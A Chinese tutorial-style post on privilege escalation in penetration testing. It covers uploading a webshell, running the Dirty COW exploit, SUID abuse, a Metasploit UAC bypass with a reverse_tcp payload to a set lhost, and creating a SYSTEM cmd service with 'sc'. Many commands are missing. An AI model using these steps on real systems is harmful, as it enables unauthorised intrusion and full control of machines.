授权渗透测试_渗透测试提权

hacker|
263

在渗透测试中经常遇到"提权",什么是提权?有哪些 *** 可以提权

提权例如你刚开始拥有的是匿名用户,后来变成了user,再后来变成了管理员,然后提升到超级管理员。这样就是提权。

具体提权 *** 给你个教程吧!放在附件里。

渗透测试之Linux下提权

直接在kali里面启用apache服务

1:在终端输入“vim /etc/apache2/ports.conf” - 键盘输入i 进入插入编辑模式 - 修改apache2默认监听端口号为8080 - 编辑好后,按Esc键+“:wq” 保存退出 - 在终端输入“/etc/init.d/apache2 start”

2:- 在浏览器地址栏输入“”

直接用kali下的默认web站点   网站环境就不搭建了  直接在网站根目录下上传一个大马  前面挖洞传webshell就跳过了  直接开始提权

上传一个大马上去

先用大马将脏牛提权利用工具上传到服务器上

执行

利用gcc编译dirty.c文件

再执行./dirty  运行dirty

最下面一行是恢复回原先root账号密码的 ***

这里就不切换到脏牛创建的用户了

什么是suid提权呢?我理解的就是有个文件,它有s标志,并且他输入root,那么我们运行这个程序就可以有了root的权限,并且这个程序还得能执行命令,不然没什么用处,那么我们就能从普通用户提升到了root权限了。

首先在本地查找符合条件的文件,有以下三个命令

常用的可用于suid提权的文件

我得Linux系统里面一个也没有 这个就过去了 百度也有一些关于SUID提权的文章

Linux提权有很多大牛开发好的提权工具可以参考以下网址

渗透测试之内网提权

UAC(User Account Control)是微软在 Windows Vista 以后版本引入的一种安全机制,通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。

当前获得的权限是存在于管理员组的时候但是并且是administrator这个用户,此时就可能需要我们进行绕过UAC的操作,否则虽然是管理员组但是实际上并没有管理员所对应的高权限操作,这个时候就需要bypass uac

开始提权

getsystem

提权失败   一般都是上面说的uac的问题  常识  bypass uac

输入background   让该会话在后台运行  不在这个模式下 没办法调用msf的提权模块

使用提权工具

set SESSION 2(这个session要和之前监听的那个session一样  否则不成功)

set TECHNIQUE up.exe

set TECHNIQUE EXE

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.107

show options

sessions -i

exploit

或者使用

use post/windows/gather/enum_patches

需要设置一下session

如果目标系统安装了安全更新的话是无法提权成功的

出现这种情况就是无法成功提权  可利用的漏洞都被打上补丁了

或者漏洞编号:ms11-080

windows 7、8、08、12、16下可以成功  2003也可以

关于sc命令:

SC 是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于“控制面板”中“管理工具”项中的“服务”。

这个命令的意思是创建一个名叫syscmd的新的交互式的cmd服务

然后执行

sc start systcmd,就得到了一个system权限的cmd环境

0条大神的评论

发表评论